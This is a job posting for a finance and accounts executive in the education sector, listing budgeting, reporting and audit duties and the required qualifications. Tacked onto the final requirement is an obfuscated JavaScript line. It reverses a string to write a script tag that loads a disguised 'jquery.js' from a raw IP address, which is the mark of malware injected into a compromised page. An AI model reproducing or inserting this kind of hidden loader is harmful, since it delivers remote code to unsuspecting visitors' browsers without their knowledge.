Industry : Education
1. Setting up the overall functions of Finance and Accounts Department to ensure readiness of operations.
2. Preparation of relevant Business Plan and Annual Budget.
3. Financial Reporting – timely and accurate financial reporting.
4. Statutory Reporting – Manage internal audit, year-end financial audit; preparation and submission of financial reports and tax reports.
5. Other matters as required.
1. Business Plan and Annual Budget
– Assist in preparation of the Company Annual and Half Yearly Revised Budgets – Balance Sheet, Income Statement and Cash Flow, by:
– Preparing and monitoring monthly budgets vs actual performance, and update forecasts.
2. Financial Reporting – timely and accurate financial reporting
– Accounts Receivable (AR)
– Treasury Management
– Accounts Payable (AP)
– Shareholders Advances / Intercompany Transactions
– Maintaining Other Balance Sheet Items
– Revenue and Expenses
– Monthly Reporting
3. Statutory Reporting – Manage internal audit, year-end financial audit, preparation and submission of financial reports and tax reports.
4. Any other appropriate duties as allocated by the Management
– Degree in Accountancy with minimum 5 years of experience.
– Experienced in handling full sets of accounts, taxation, budgeting and liaising with external auditors, tax and bankers.
– Computer literate ( Microsoft Office Applications)
– Experienced in using the accounting system.
– Systematic and organised filing system (both physical filing and softcopies in server) for all tasks performed. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))